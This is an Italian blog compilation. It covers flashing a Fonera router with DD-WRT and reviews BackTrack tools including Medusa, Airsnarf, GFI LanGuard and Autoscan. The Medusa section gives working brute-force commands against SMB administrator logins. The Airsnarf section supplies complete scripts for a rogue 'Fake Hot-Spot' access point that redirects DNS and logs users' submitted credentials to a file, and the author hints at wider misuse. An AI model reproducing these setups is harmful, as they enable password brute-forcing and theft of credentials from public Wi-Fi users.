Blog di Antonio Trinca

1 Prerequisiti

1. SSH client
* Per windows basta scaricare putty qui:

2. Telnet client
* Per windows va bene dinuovo putty

3. I files root.fs e vmlinux.bin.l7 dell’ultima release di dd-wrt x fonera
scaricabili qui :

[LINK]
[LINK]
(Tasto destro salva con nome)

4. Hfs webserver per windows, un web server per poter inviare i files alla fonera scaricabile qua:

5. Un tftp server per poter procedere con il flash del firmware.

Scarica

6.La pagina html per abilitare l’ssh ed i files out.hex e openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma per abilitare il RedBoot.

http://uselesshacks.com/wp-content/uploads/2007/03/sshenable.htm
(Tasto destro salva con nome e salvate la pagina)

http://fonera.info/camicia/openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma

http://fonera.info/camicia/out.hex

++Creiamo uan cartella e scarichiamoci dentro tutti i softwares e files necessari++

————-INIZIO PROCEDURA————-

1]Verifica versione firmware fonera

Per poter inserire il firmware dd-wrt è necessario abilitare l’ssh sulla fonera.

Le ultime fonere hanno una versione di firmware 0.7.1 r2 mentre quelle vecchie hanno una versione 0.7.1 r1 o inferiore.

Se la nostra fonera ha il firmware 0.7.1 r2 bisogna seguire la procedura di downgrade del firmware per poteer abilitare l’ssh.

Per poter verificare che versione di firmware ha la fonera che ci è appena arrivata seguite i seguenti passi:

In Windows, disabiliatate tutte le schede di rete tranne quella collegata alla FON. Disiabilitiamo tuti i firewall.
Colleghiamo con il cavo in dotazione rj45 la nostra fonera alla porta ethernet del nostro pc.

Settimamo la nostra scheda di rete del pc con questi valori :

IP: 169.254.255.2
Subnet: 255.255.0.0
Default Gateway: 169.254.255.1
DNS: 169.254.255.1

Accendiamo la fonera e aspettiamo che tutti e tre i leds lampeggino:

colleghiamoci alla pagina

http://169.254.255.1

Ci verrà chiesto l’utente e la password, inseriremo quelli di default

Username: root
Password: admin

A questo punto clikkiamo su status (router status) e verifichiamo la versione del firmware.

Configuration Summary:
Firmware version:

Se la versione del firmware è 0.7.1 r1 o più bassa saltiamo direttamente alla sezione dove spiego come abilitare l’ssh, se invece la versione del firmware è 0.7.1 r2 seguiamo la procedura di downgrade del firmware qui di seguito.

2]Downgrade firmware fonera

Per poter downgradare il firmware della fonera basta seguire la procedura di reset che magicamente ci porterà alla versione precedente permettendoci poi in seguito di abilitare l’ssh

+ Prendete uno stuzzicadente e con fonera accessa lo infilate nel retro nel buchino di reset.

+ Tenete premuto lo stuzzicandente per 30 secondi

+ Sempre tenendo premuto lo stuzzicadente togliete l’alimentazione alla fonera.

+ Sempre tenendo premuto lo stuzzicadente, rimettetete l’alimentazione
e aspettiamo finchè il led “W-LAN” appare e subito dopo sparisce.(Circa 2 3 minuti di continua pressione dello stuzzicandente).

+ Quando il led “W-LAN” appare e subito dopo sparisce, possiam lasciare lo stuzzicadente e aspettare altri 2-3 minuti finchè il led “W-LAN” riappaia.

+Fatto!! il nostro firmware è magicamente diventato versione 0.7.1 r1

+ Seguiamo la procedura per abilitare l’ssh

3] Abilitare l’ssh

Apriamo con il browser il file sshenable.htm che abbiamo salvato nella nostra cartella.

Clikkiamo su “submit”.

4]Abilitare il Redboot

Adesso avviamo HFS.
La prima volta che apriamo HFS, ci chiederà se vogliamo includere HFS nel vostro menù contestuale.Diciamo di “No”.
Adesso clicchiamo con il tasto destro sull’icona della piccola casetta, e selezioniamo “Add Files…”, e aggiungiamo i files scaricati precedentemente ovvero : “openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma” e il file “out.hex”.
Lasciamo attivo HFS.

Adesso apriamo Putty e selezionaldo il protoccollo SSH ci colleghiamo in ssh alla fonera inserendo l’ip “169.254.255.1″ clickkando “Open”.

Se ‘ la prima volta che ci colleghiamo alla fonera in ssh ci verrà chiesto di salvare la chiave ssh con un prompt. Noi diciamo “YES”.

Usiamo come login e password i seguenti:

Username: root
Password: admin

Premiamo enter

Una volta entrati nella fonera eseguiamo i seguenti command:

++Per abilitare l’ssh al boot++

mv /etc/init.d/dropbear /etc/init.d/S50dropbear

Scommentiamo (toglendo il cancelletto all’inizio) le due seguenti linee del file /etc/firewall.user

vi /etc/firewall.user

# iptables -t nat -A prerouting_rule -i $WAN -p tcp –dport 22 -j ACCEPT
# iptables -A input_rule -i $WAN -p tcp –dport 22 -j ACCEPT

iptables -t nat -A prerouting_rule -i $WAN -p tcp –dport 22 -j ACCEPT
iptables -A input_rule -i $WAN -p tcp –dport 22 -j ACCEPT

Disabilitiamo il client /bin/thinclient che comunica con il sito della fonera
.
Dobbiamo commentare nel file /bin/thinclient l’ultima riga e inserirne una nuova come qui di seguito.

#. /tmp/.thinclient.sh
cp /tmp/.thinclient.sh /tmp/thinclient-$(date ‘+%Y%m%d-%H%M’)

++Trasferiamo i files per il Redboot dall HFS alla fonera++

cd /tmp
wget http://169.254.255.2/openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma

++Aspettiamo che il trasferimento sia terminato++
++Lanciamo i seguenti comandi e aspettiamo che ci ritorni il prompt++

mtd -e vmlinux.bin.l7 write openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma vmlinux.bin.l7

reboot

Effettuato il reboot aspetteremo 2-3 minuti finche tutti e 3 i leds lampeggeranno.

Riapriamo putty per ricollegarci in ssh nella fonera:

Username: root
Password: admin

Eseguigiamo i seguenti comandi e aspettiamo che ci ritornino il prompt dei comandi.

cd /tmp
wget http://169.254.255.2/out.hex
mtd -e “RedBoot config” write out.hex “RedBoot config”
reboot

Congratuliazioni!!!!! Avete abilitato il RedBoot che permette di accedere al bootloader, adesso possiamo flashare la fonera con il DD-WRT.

Possiamo chiudere HFS.

5]Flasshing OPENWRT sulla fonera

Adesso potremo collegarci alla fonera via web:
http://192.168.1.1 con utente root e password admin.

Grazie al Team di www.wifi-ita.com

Scopriamo le nostre potenzialità!!!! mandatemi un feedback dei risultati ottenuti

Scaricate la guida gratuita al corso di memoria:

suoni-fonetici

La password per aprire la guida è: wte5423

Ciao a tutti,

eccoci arrivati a descrivere e a testare un altro tool , inserito in BackTrack nella sezione del “Privilege Escalation” , il tool di cui stiamo parlando , già dalla foto , è il Medusa…

…ma cosa è Medusa?
Medusa è un login brute-forcer veloce, modulare, parallelo per servizi di
rete , creato da the geeks [Foofus.net].

Il nome Medusa , deriva proprio dall’obbiettivo principale dei creatori di questo tool , e cioè:

il supporto di quanti più servizi di rete possibili che richiedano l’autenticazione da remoto verso un unico host da attaccare.

I creatori di Medusa individuano 3 caratteristiche principali attribuibili al tool:

Può essere utilizzato contro più hosts, users o passwords contemporaneamnte;

• -Flessibilità dell’input: le informazioni sull’obbiettivo possono essere fornite al

tool in vari modi e ogni attacco può essere diretto a una sola vittima
o a più vittime contemporaneamente;

• design modulare: ogni modulo è presente come un file *.mod indipendente.

Ciò significa che non è necessaria alcuna modifica al “core” del tool per implementare
altre funzioni inizialmente non supportate da Medusa.

Passiamo ora all’uso più prettamente pratico del tool in questione:

Per visualizzare tutte le opzioni che Medusa supporta ci basta digitare
%medusa

l’output sarà:

bt ~ # medusa
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module’s usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version

Ora possiamo visualizzare tutti i moduli che sono già implementati all’ interno di Medusa con la
versione installata indicata a lato , diamo quindi da shell il seguente comando:

bt~# medusa -d

ed il nostro sistema ci elencherà i moduli disponibili…

bt ~ # medusa -d
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

Available modules in “.” :

Available modules in “/usr/local/lib/medusa/modules” :
+ cvs.mod : Brute force module for CVS sessions : version 1.0.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
+ http.mod : Brute force module for HTTP : version 1.3.0
+ imap.mod : Brute force module for IMAP sessions : version 1.1.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
+ mysql.mod : Brute force module for MySQL sessions : version 1.2
+ nntp.mod : Brute force module for NNTP sessions : version 0.9
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
+ pop3.mod : Brute force module for POP3 sessions : version 1.1.1
+ postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0
+ rexec.mod : Brute force module for REXEC sessions : version 1.1.1
+ rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
+ rsh.mod : Brute force module for RSH sessions : version 1.0.1
+ smbnt.mod : Brute force module for SMB/NTLMv1 sessions : version 1.3.1
+ smtp-auth.mod : Brute force module for SMTP Authentication with TLS : version 0.9.1
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 0.9.1
+ snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
+ svn.mod : Brute force module for Subversion sessions : version 1.0.0
+ telnet.mod : Brute force module for telnet sessions : version 1.2.1
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.0
+ vnc.mod : Brute force module for VNC sessions : version 1.0.1
+ web-form.mod : Brute force module for web forms : version 0.9
+ wrapper.mod : Generic Wrapper Module : version 1.0.1

Per visualizzare le opzioni riguardanti ciascun modulo è sufficiente digitare:
medusa -M nomemodulo -q

esempio: medusa -M mysql -q (Il modulo utilizzato in questo esempio è mysql.mod)

L’output sarà il seguente:

bt ~ # medusa -M mysql -q
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

mysql.mod (1.2) JoMo-Kun <jmk@foofus.net> :: Brute force module for MySQL sessions

Available module options:
PASS:? (PASSWORD*, HASH)
PASSWORD: Use normal password.
HASH: Use a hash rather than a password. (non-SHA1 hashes only)

(*) Default value

Usage examples:

1: Normal boring check…
medusa -M mysql -h somehost -u someuser -p somepassword

2: Using an old-style MySQL hash…
medusa -M mysql -h somehost -U users.txt -p 39b52a209cf03d62 -m PASS:HASH

Andiamo avanti con il nostro tutorial per capire effettivamente come funziona
Medusa.

Eseguiamo un attacco:
i comandi che seguono servono a Medusa per testare tutte le password contenute nel
file che chiemrò “passwords.txt” contro un singolo user (administrator) sull’host 192.168.0.20 attraverso il protocollo SMB.
I comandi dati dovrebbero essere chiari mentre per l’ -e ns , che non è assolutamente
da tralasciare , serve un’ulteriore spiegazione. Questi infatti serve a per far eseguire al
tool un controllo supplementare , controllo che andrà a verificare che l’administrator abbia lasciato in bianco il campo “password” oppure nel caso in cui “password” e “username” siano gli stessi.

bt~# medusa -h 192.168.0.20 -u administrator -P passwords.txt -e ns -M smbnt

Medusa v1.0-rc1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: (1/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: administrator (2/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: password (3/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass1 (4/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass2 (5/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass3 (6/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass4 (7/7)

L’attacco è stato effettuauto.

La riga di comando in basso ci mostra la funzionalità di Medusa per quanto riguarda l’attacco
parallelo. Qui almeno 20 hosts e 10 users sono attaccati contemporaneamente. L’istruzione -L serve per far
controllare a Medusa un solo username di ogni host specificato.

medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt

Medusa è stata progettata per ricevere da input host/username/password, dati che possono essere usati in un file detto “combo” file , ovvero combinato.

Un file combo può essere specficato tramite l’opzione “-C“.
Il file deve avere i valori formattati per colonna in questo modo:
host:user:password
Se uno dei 3 valori viene lasciato vuoto, la rispettiva informazione deve essere fornita o attraverso una
valutazione globale o attraverso un’apposita lista contenuta in un altro file.
Medusa provvederà a un controllo dei parametri utilizzando la prima riga del file fornitogli.

Le combinazioni utilizzabili in un combo file sono le seguenti:

host:username:password
host:username:
host::
:username:password
:username:
::password
host::password

Quindi riportiamo di seguito il comando per un semplice attacco che controllerà ogni voce riportata
in un combo file:

medusa -M smbnt -C combo.txt

il file combo:
192.168.0.20:administrator:password
192.168.0.20:testuser:pass
192.168.0.30:administrator:blah
192.168.0.40:user1:foopass

Mentre l’esempio succesivo servirà per controllare ogni voce del file combo.txt contro gli obbiettivi
in lista nel file “hosts.txt“.

medusa -M smbnt -C combo.txt -H hosts.txt

il file combo.txt:
administrator:password
testuser:pass
administrator:blah
user1:foopass

Medusa inoltra supporta i files PwDump come combo file; la formattazione di questi file deve essere la
seguente:
user:id:lm:ntlm:::
Medusa cerca ::: alla fine della prima linea per determinare se il file contiene un output PwDump.

***

***

Parlando del Medusa , quì nel «back|track~blog , non è la prima volta che parliamo di Password-Attack , infatti prima di questo tool abbiamo trattato l’ Hydra , attualmente sempre in backtrack , ma visto che su Hydra di video in rete già se ne tovano , abbiamo realizzato un video usando come tool appunto Medusa… …per coloro che volessero vederne le differenze posso recarsi a quest’ indirizzo.

Dal video potete vedere benissimo che abbiamo realizzato due tipi di attacco con Medusa , entrambi diretti su di un unico host , determinato tramite IP , dove la prima volta per effettuare l’ attacco usufruisco di quattro files di testo , hosts.txt [opzione -H] , pass.txt [opzione -P] , user.txt [opzione -U] , e res.txt [opzione -O] , per ottenere il risultato in un file di testo.

Dal video , nel primo caso otteniamo il risultato dal valore immesso tra le parentesi da Medusa , [ad esempio (1/7)] , che ha successo con la prima stringa (1) immessa nel file ; nel secondo caso invece utilizzo un file combo , che contiene le stesse informazioni dei files precedenti , naturalmente inseriti come da spiegazione descritta sopra.

Entrambe riportano come password la stringa “brigante“.

Tutti i files sono contenuti nella directory “/” , in modo da non dover digitare da shell tutti i percorsi dove i files *.txt sono contenuti.

Fonte: Carlito Brigante Blog

Configure AirSnarf on BackTrack

***

Ecco a voi un altro gioiellino di Defcon-69 , si tratta di un tutorial che spiega come configurare AirSnarf per la nostra BackTrack-3beta.

ancora una volta , grazie Def.

In questo breve tutorial spiegherò come configurare Airsnarf

Cos’è Airsnarf ?

Airsnarf è stato sviluppato e rilasciato per dimostrare la vulnerabilità intrinseca degli hot-spot.
E’ quindi, una banale wireless utility  che permette all’Eavesdropper di carpire le credenziali di accesso (user e pwd) di utenti che fanno uso di hot-spot pubblici. (Naturalmente l’uso  che se ne può fare è ben più ampio se usiamo un po’ di immaginazione!  )

Let’s work…

1.Prima di tutto creiamo due cartelle, chiamate “html” e “dhcp”, nei rispettivi percorsi:

“html”  —->  /var/www/
“dhcp” —-> /var/state/

Successivamente creiamo con un editor di testo, il file “dhcpd.leases” e lo copiamo in /var/state/dhcp/

2.Ora apriamo un editor di testo (nano, vi, kate, kedit, ecc…) e creiamo il file “rc.httpd” e vi copiamo all’interno il seguente source code:

#!/bin/sh
# Start/stop/restart the Apache web server.

conffile=/etc/httpd/httpd.conf

function start() {
if grep -q “^Include /etc/apache/mod_ssl.conf” $conffile ; then
/usr/sbin/apachectl startssl
else
/usr/sbin/apachectl start
fi
}

function stop() {
/usr/sbin/apachectl stop
}

function restart() {
/usr/sbin/apachectl restart
}

# See how we were called.
case “$1″ in
start)
start
;;
stop)
stop
;;
restart)
restart
;;
*)
echo “usage $0 start|stop|restart” ;;
esac

Fatto questo, salvatelo e chiudete il file.

3.Ora riapriamo l’editor di testo (nano, vi, kate, kedit, ecc…) e creiamo il file “rc.dhcpd” e vi copiamo all’interno il seguente source code:

#!/bin/sh
# Start/stop/restart the Samba SMB file/print server.

dhcpd_start() {
if [ -x /usr/sbin/dhcpd -a -r /etc/dhcpd.conf ]; then
echo “Starting Dhcp…”
/usr/sbin/dhcpd -cf /etc/dhcpd.conf ath0
fi
}

dhcpd_stop() {
killall dhcpd
}

dhcpd_restart() {
dhcpd_stop
sleep 2
dhcpd_start
}

case “$1″ in
’start’)
dhcpd_start
;;
’stop’)
dhcpd_stop
;;
‘restart’)
dhcpd_restart
;;
*)
# Default is “start”, for backwards compatibility with previous
# Slackware versions. This may change to a ‘usage’ error someday.
dhcpd_start
esac
Fatto questo, salvatelo e chiudete il file.

4.Entrambi i file andranno copiati nella seguente directory: /etc/rc.d/

5.Ora che siamo nella directory /etc/rc.d/ ed abbiamo copiato i due file, dobbiamo dargli i permessi di eseguibilità. Apriamo una shell (ed abbiamo copiato i due file, dobbiamo dargli i permessi di eseguibilità. Apriamo una shell (F4) e digitiamo:

chmod 755 /etc/rc.d/rc.httpd e poi chmod 755 /etc/rc.d/rc.dhcpd

6.Adesso andiamo in /pentest/wireless/airsnarf-0.2  e apriamo Airsnarf con un editor di testo.
Sostituiamo il contenuto del file con il seguente source code:

#!/bin/bash
# airsnarf.sh
# A rogue AP setup utility.

echo “Airsnarf - A rogue AP setup utility.”
echo “0.2″
echo “The Shmoo Group”
# here are some variables you may want to edit
WWW_ROOT=”/var/www/html”
CGI_ROOT=”/var/www/cgi-bin”
LOCAL_CFG=”./cfg”

# specify another config dir with a command line arg if you want
if [ $1 ]
then
LOCAL_CFG=”$1″
fi

source $LOCAL_CFG/airsnarf.cfg

# create the dhcpd.conf
echo -n “Creating dhcpd.conf…”
sed s/AIRSNARF/$ROGUE_NET/g ./etc/dhcpd.src > /etc/dhcpd.conf
echo “Done.”

# copy over the www stuff
echo -n “Building the captive portal…”
cp $LOCAL_CFG/html/* $WWW_ROOT
cp $LOCAL_CFG/cgi-bin/* $CGI_ROOT
chmod +x $CGI_ROOT/*
echo “Done.”

# set our wireless parameters
echo -n “Setting the wireless parameters…”
ifconfig $ROGUE_INTERFACE down
wlanconfig $ROGUE_INTERFACE destroy
wlanconfig $ROGUE_INTERFACE create wlandev wifi0 wlanmode ap
ifconfig $ROGUE_INTERFACE up
iwconfig $ROGUE_INTERFACE essid $ROGUE_SSID mode master
echo “Done.”

# set our ip and default route
echo -n “Setting the ip address and default route…”
ifconfig $ROGUE_INTERFACE $ROGUE_GW
route add -net 0.0.0.0 gw $ROGUE_GW
echo “Done.”

# restart some services
/usr/sbin/dhcpd -cf /etc/dhcpd.conf
/usr/sbin/apachectl restart
#/etc/init.d/sendmail restart

# set up the firewall to redirect
echo -n “Setting up firewall to redirect DNS…”
echo 1 > /proc/sys/net/ipv4/ip_forward
modprobe iptable_nat
iptables -F -t nat
iptables -t nat -A PREROUTING -p udp –dport 53 -j DNAT \
–to $ROGUE_GW
# dammit, I swear this used to work with just an OUTPUT rule…
iptables -t nat -A OUTPUT -p udp –dport 53 -j DNAT \
–to $ROGUE_GW
echo “Done.”

# start the local dns resolver
echo “Starting local DNS resolver…”
chmod +x ./bin/airsnarf_dns.pl
./bin/airsnarf_dns.pl

Fatto questo, salvatelo e chiudete il file.

7.Adesso andiamo in /pentest/wireless/airsnarf-0.2/cfg  e apriamo Airsnarf.cfg con un editor di testo.
Sostituiamo il contenuto del file con il seguente source code:

ROGUE_SSID=”Fake Hot-Spot”
ROGUE_NET=”192.168.1.”
ROGUE_GW=”192.168.1.254″
ROGUE_INTERFACE=”ath0″
#export ROGUE_SSID ROGUE_NET ROGUE_GW ROGUE_INTERFACE

8.Adesso andiamo in /pentest/wireless/airsnarf-0.2/cfg/cgi-bin  e apriamo Airsnarf.cgi con un editor di testo.
Cerchiamo la serie di righe di codice che iniziano con “$mailprog = ‘/usr/sbin/sendmail’;” e finiscono con “close(MAIL);” e le commentiamo col carattere # oppure le cancelliamo.
E vi copiamo il seguente source code:

open (MYFILE, ‘>>/tmp/airsnarf_pwds.txt’);
foreach $key (keys(%FORM)) {
print MYFILE “$key = $FORM{$key}\n”;
print MYFILE “———————-\n”;
}
;

Fatto questo, salvatelo e chiudete il file.

9.Ora basterà che apriate una shell, andiate in /pentest/wireless/airsnarf-0.2/ e lanciate airsnarf.

N.B  Una volta avviato airsnarf, aspettate che compaia la scritta “Waitintg for connections…” e terminate airsnarf. Andate in /var/www/html, copiatevi tutti i file contenutivi e incollate tutti i file qui: /var/www/htdocs  .

/var/www/htdocs .

Fonte: Carlito Brigante Blog

come da titolo andrmo a drscrivere uno dei Vulneability Scanner più famosi che si vedono in rete , stiamo parlando del GFI-Languard , (attualmente alla versione 2.0) , inserito da sempre , in BackTrack nell’ apposita sezione del “Vulnerability Identification“.

GFI-Languard è un prodotto della GFI Security & Messaging Software , è molto famoso e diffuso , grazie alla sua versatilità.

In BackTrack GFI-Languard si avvia grazie all’ ausilio di Wine , infatti già dalla prima apertura del programma l’interfaccia grafica in winz style , è ampiamente riconoscibile.

Il pregio di un programma del genere è quello di racchiudere dentro di se più tools , in grado di metterci nelle migliori condizioni per fare il test delle vulnerabilità note di più domini o server , di ricercare patch mancanti eccetera…

Voglio specificare subito che GFI-Languard può essere usato per identificazione delle vulnerabilità da parte di admin e non per creare attacchi e quindi eseguire pentesting , anche se dopo una scansione effettuata si può decidere di compiere lo stesso un attacco , ma vedrete dalle righe che seguono eventuali opzioni da prendere in considerazione.

Avendo in locale il mio Server , facciamo con GFI-Languard una prova per vedere come funziona e che risultato ci fornisce.

Passiamo quindi a fare il nostro scanning , non prima naturalmente di aver messo a posto delle opzioni…

Innanzitutto bisogna selezionare l’ host da scannerizzare , che potrebbero essere anche più di uno , potremmo effettuare delle scansioni di interi network , su un intero dominio Windows ad esempio e dal risultato in basso , in formato html , riusciremo a vedere tutte le informazioni raccolte , host per host.

Nel mio caso , avendo nella mia Lan un Server all’ indirizzo 29.230.6.75 , inserirò quest’ IP nello spazio indicato in alto , tenendo conto di tenermi l’ host anche per futuri esperimenti , dandogli quindi un nome , un eventuale commento e salvando il tutto.

Ma andiamo avanti…

Nella selezione degli Alerts , l’ icona con il punto esclamativo , vengono inserite tutte quelle vulnerabilità che a noi più interessano , ma che GFI-Languard seleziona automaticamente tutte in blocco.

Questa l’interfaccia dopo la scannerizzazione del server..

***

***

Come possiamo vedere dall’ immagine , GFI-Languard ci ha restituito un ampio e dettagliato risultato , dagli header del sito che si trova sul server , all’ intero range di informazioni che il server usa per i DNS e la Subnet che uso io.

Lo scanning , bisogna dirlo , non è durato molto , ed ha restituito un buon numero di informazioni , dal MAC-Address , a tutti i servizi aperti , porta per porta , che nel nostro caso sono stati individuati:

Il servizio Samba , il webserver Apache con tipo di protocollo , (SSH - HTTP-secure) , PHP alla versione 5.2.1 , Il tipo di server WinServer2003 Spk.2 , la versione , e 5 porte aperte con tanto di servizio incluso.

La caratteristica principale di un prodotto quale GFI-Languard , è quella di evitare all’ utente di verificare servizio per servizio tutte le possibili “aperture” sconsiderate e che potrebbero causare problemi legati a vulnerabilità “note” , con un notevole risparrmio di tempo e di lavoro.

La rilevazioni che GFI-Languard tiene in considerazione principalmente sono:

Il tipo di Server , la versione ed eventuale Service Pack.—>Nel nostro caso ripeto: WinServ.2003 - Spk.2 - con il Mac-Address riportato , il nome del Workgroup ed il nome dell’ host.

Le eventuali patch di sicurezza mancanti

I punti di accesso Wireles.

Condivisioni in linea e porte aperte.

—>Nel nostro caso ha trovato: Samba , Subnet , 5 porte aperte con servizi annessi e nessun utente “loggato”

Naturalmente volendo possiamo “maneggiare” tutti i tipi di alert , solo per fare un esempio ho lasciato selezionata la spunta sul controllo CGI , (Common Gateway Interface) , perché l’ host da scannerizzare conteneva un webserver , ma nel caso sia stato una situazione diversa , per risparmio di tempo e di lettura risultato , avrei benissimo potuto togliere la spunta di selezione.

Il tutto è stato eseguito nel mio caso per la prima volta con GFI-Languard , la prossima volta potrò tenere il profilo salvato con le stesse condizioni di utilizzo.

Una caratteristica , importante , che GFI-Languard ci mette a disposizione è l’ accesso da remoto sul computer/server con delle credenziali determinate… …esempio:

***

***

Nel caso indicato in figura , possiamo vedere che le impostazioni di accesso sono quelle che GFI-Languard usa di default , ma che noi possiamo cambiare a seconda della situazione in cui ci troviamo.

Sul mio server , non posso ovviamente accedervi senza credenziali , sono nella mia subnet , abbastanza sicura , ma per accedervi devo usare username e password dell’ account administrator oppure di un utente guest o altro.

Questa particolare scelta ci permette di avere dal risultato della scansione molte cose utili in più alla scansione già effettuata in precedenza , come ad esempio il test della complessità della password usata , , per i sistemi UNIX della KEY , mettendoci in condizioni tali da poterla eventualmente cambiare.

Quando in questo caso GFI-Languard esegue una scansione , le credenziali di accesso da remoto sono quelle che caratterizzano il sistema su cui GFI-Languard è in esecuzione , intese come “default”.

Queste credenziali che GFI-Languard ci fa inserire sono , come detto sopra , salvabili all’ interno di ogni profilo , in questo modo ci possiamo connettere ad ogni server con delle credenziali diverse , ognuna contenuta in un profilo diverso, eseguibile ad ogni scansione singolarmante e tutti insieme , tanto il risultato sarà sempre descrittivo host - per - host , server per server , dominio per dominio.

GFI-Languard è un’ ottimo tool per la scansione di Servizi aperti e di Eventuali possibili falle su sistemi , ma come pentesting , (inteso come vero attacco) , bisogna rendersi conto di più fattori , come , giusto per fare qualche esempio , il fatto che GFI-Languard lascia log sui sistemi scannerizzati , avverte in modo chiaro gli admin dei ping ricevuti , non performa i ping dopo che l’ host in ricezione ha rigettato lo stesso , considerandolo down , spento… …ma non credo sia questo il suo scopo.

Per ciò per cui è stato creato , è un ottimo tool senza ombra alcuna , in caso di BUG “noti” , GFI-Languard ci fornisce addirittura la natura della patch e dove poterla reperire , questo è propriamente il suo ruolo a cui credo adempia ampiamente , pensiamo ad un admin aziendale , che deve tenere sott’ occhio una cinquantina di pc magari su più domini , non credo che sia un programma di cui si possa fare a meno.

Il mio server , creato per consentirmi di fare pentesting , quindi BUGato se preso all’ interno della mia subnet , non è stato oggetto di verifica da parte di GFI-Languard , la versione di PHP che utilizzo insieme alla versione di apache porta un BUG , (anche vecchio e molto conosciuto) , ma che non è risultato nella scansione.

Nel compenso GFI-Languard è stato in grado di enumerarmi tutta la subnet e l’ ha fatto in maniera velocissima , e soprattutto è stato in grado di riportarmi tutte le informazioni che un admin , su WinServer 2003 , avrebbe scoperto con molto più tempo e lavoro.

Un altro dei tanti ottimi prodotti inseriti in BackTrack , che usato allo scopo giusto , ci evita di spendere una granparte di tempo e fatica.

I risultati di scansione sono organizzati in categorie , e visibili comodamente all’ occhio tramite delle icone , di cui ne riporto un solo esempio:

Da qui possiamo già capire che se abbiamo bisogno di scannerizzare e tenere sotto controllo 2/3 domini , GFI-Languard è quello che fa al caso nostro.

La grande veersatilità di configurazione poi di cui gode GFI-Languard è a dir poco eccezionale , secondo ogni criterio è possibile fare una configurazione diversa della nostra scansione , facendo riferimento ad una scansione predefinita con un determinato profilo salvato , GFI-Languard ci mette al corrente delle diversità tra più scansioni e lo fa con le caratteristiche di cui gode maggiormente , velocità ed efficacia di analisi settore per settore , servizio per servizio , con orario di login di eventuali utenti connessi e tutto ciò che serve ad un admin per poter tenere sotto controllo il proprio network , il tutto comodamente salvato in un file html.

***

***

Fonte: Carlito Brigante Blog

***

Autoscan, un tool multifunzione , potente e facile da gestire , inserito in BackTrack nella sezione del Network Mapping.

Perchè multifunzione?

Il fatto è il seguente…

In BackTrack a menochè non ci si crei un utente dopo l installazione , ci si “logga” come utente amministratore… …root , questa è una caratteristica che può causare vari problemi se si fanno degli errori , ma oltre a questo si è vulnerabili a livello di sicurezza.

Fermorestando che rimango sempre dell’opinione che la cosa migliore da fare sia crearsi un utente supplementare , Autoscan può risolvere , (almeno in parte) , anche la questione sicurezza , fungendo quindi , se impostato in maniera corretta , come un vero e proprio firewall.

Le molte funzionalità che contraddistinguono Autoscan lo inseriscono tra i livelli piu alti tra tutti i tool della sua categoria , infatti solo per aggiungere la caratteristica principale del programma , Autoscan è famoso per avere la possibilità di controllare il proprio network non solo in locale , ma anche a distanza… …anche più di un network , con predisposizione a molti apparati hardware.

Le caratteristiche di Autoscan sono molte , diamo solo per iniziare uno sguardo all’ interfaccia grafica…

***

***

Autoscan può controllare tutti i tipi di reti , anche quelle , naturalmente dopo una propria configurazione , protette da firewall.

Elenchiamo ora alcune principali caratteristiche di Autoscan:

–> scansione della rete in multi-thread;
–> esplorazione automatica della rete;
–> nessun sovraccarico di rete dovuto al tool;
–> utilizzo di user “agents”;

inoltre:

–>analisi automatica della rete;
–>supervisione dei dispositivi (router, server, firewall, ….)
–>supervisione dei vari servizi di rete (smtp, http, pop, …)
